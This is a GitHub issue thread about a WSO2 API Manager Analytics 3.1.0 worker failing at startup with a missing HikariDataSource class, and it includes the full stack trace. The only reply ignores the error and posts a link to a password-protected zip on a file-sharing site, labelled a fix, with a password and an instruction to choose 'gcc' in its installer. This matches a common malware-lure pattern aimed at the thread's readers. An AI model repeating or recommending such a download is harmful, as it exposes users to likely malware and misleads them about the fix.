### ISSUE TITLE
AM Analytics 3.1.0 startup issue

### ISSUE THREAD

**Issue by msm1992** [wso2/api-manager#3081]
### Description

Getting below issue when starting wso2am-analytics 3.1.0 worker profile.

```
[2024-08-26 15:42:13,658] ERROR {org.wso2.sp.extension.siddhi.io.mgwfile} - [SCR] Error while trying to bind reference Reference[name = org.wso2.carbon.datasource.DataSourceService, interface = org.wso2.carbon.datasource.core.api.DataSourceService, policy = dynamic, cardinality = 1..n, target = null, bind = onDataSourceServiceReady, unbind = unregisterDataSourceService]
	Details:
	Problematic reference = Reference[name = org.wso2.carbon.datasource.DataSourceService, interface = org.wso2.carbon.datasource.core.api.DataSourceService, policy = dynamic, cardinality = 1..n, target = null, bind = onDataSourceServiceReady, unbind = unregisterDataSourceService]
	of service component = org.wso2.analytics.apim.MGWFileSourceDS
	component implementation class = org.wso2.extension.siddhi.io.mgwfile.MGWFileSourceDS
	located in bundle with symbolic name = org.wso2.sp.extension.siddhi.io.mgwfile
	bundle location = reference:file:../lib/plugins/org.wso2.sp.extension.siddhi.io.mgwfile_3.1.0.28.jar java.lang.reflect.InvocationTargetException
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.eclipse.equinox.internal.ds.model.ComponentReference.bind(ComponentReference.java:376)
	at org.eclipse.equinox.internal.ds.model.ServiceComponentProp.bindReference(ServiceComponentProp.java:444)
	at org.eclipse.equinox.internal.ds.model.ServiceComponentProp.bind(ServiceComponentProp.java:218)
	at org.eclipse.equinox.internal.ds.model.ServiceComponentProp.build(ServiceComponentProp.java:343)
	at org.eclipse.equinox.internal.ds.InstanceProcess.buildComponent(InstanceProcess.java:620)
	at org.eclipse.equinox.internal.ds.InstanceProcess.buildComponents(InstanceProcess.java:197)
	at org.eclipse.equinox.internal.ds.Resolver.getEligible(Resolver.java:343)
	at org.eclipse.equinox.internal.ds.SCRManager.serviceChanged(SCRManager.java:222)
	at org.eclipse.osgi.internal.serviceregistry.FilteredServiceListener.serviceChanged(FilteredServiceListener.java:109)
	at org.eclipse.osgi.internal.framework.BundleContextImpl.dispatchEvent(BundleContextImpl.java:915)
	at org.eclipse.osgi.framework.eventmgr.EventManager.dispatchEvent(EventManager.java:230)
	at org.eclipse.osgi.framework.eventmgr.ListenerQueue.dispatchEventSynchronous(ListenerQueue.java:148)
	at org.eclipse.osgi.internal.serviceregistry.ServiceRegistry.publishServiceEventPrivileged(ServiceRegistry.java:862)
	at org.eclipse.osgi.internal.serviceregistry.ServiceRegistry.publishServiceEvent(ServiceRegistry.java:801)
	at org.eclipse.osgi.internal.serviceregistry.ServiceRegistrationImpl.register(ServiceRegistrationImpl.java:127)
	at org.eclipse.osgi.internal.serviceregistry.ServiceRegistry.registerService(ServiceRegistry.java:225)
	at org.eclipse.osgi.internal.framework.BundleContextImpl.registerService(BundleContextImpl.java:464)
	at org.eclipse.osgi.internal.framework.BundleContextImpl.registerService(BundleContextImpl.java:482)
	at org.eclipse.osgi.internal.framework.BundleContextImpl.registerService(BundleContextImpl.java:999)
	at org.wso2.carbon.datasource.core.internal.DataSourceListenerComponent.onAllRequiredCapabilitiesAvailable(DataSourceListenerComponent.java:128)
	at org.wso2.carbon.kernel.internal.startupresolver.StartupComponentManager.lambda$notifySatisfiableComponents$7(StartupComponentManager.java:266)
	at java.util.ArrayList.forEach(ArrayList.java:1259)
	at org.wso2.carbon.kernel.internal.startupresolver.StartupComponentManager.notifySatisfiableComponents(StartupComponentManager.java:252)
	at org.wso2.carbon.kernel.internal.startupresolver.StartupOrderResolver$1.run(StartupOrderResolver.java:204)
	at java.util.TimerThread.mainLoop(Timer.java:555)
	at java.util.TimerThread.run(Timer.java:505)
Caused by: java.lang.NoClassDefFoundError: com/zaxxer/hikari/HikariDataSource
	at org.wso2.extension.siddhi.io.mgwfile.MGWFileSourceDS.onDataSourceServiceReady(MGWFileSourceDS.java:146)
	... 30 more
Caused by: java.lang.ClassNotFoundException: com.zaxxer.hikari.HikariDataSource cannot be found by org.wso2.sp.extension.siddhi.io.mgwfile_3.1.0.28
	at org.eclipse.osgi.internal.loader.BundleLoader.findClassInternal(BundleLoader.java:448)
	at org.eclipse.osgi.internal.loader.BundleLoader.findClass(BundleLoader.java:361)
	at org.eclipse.osgi.internal.loader.BundleLoader.findClass(BundleLoader.java:353)
	at org.eclipse.osgi.internal.loader.ModuleClassLoader.loadClass(ModuleClassLoader.java:161)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:351)
	... 31 more
```

### Steps to Reproduce

Update wso2am-analytics-3.1.0 to U2 level 58 or higher and start the worker server.

### Affected Component

Analytics

### Version

3.1.0

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
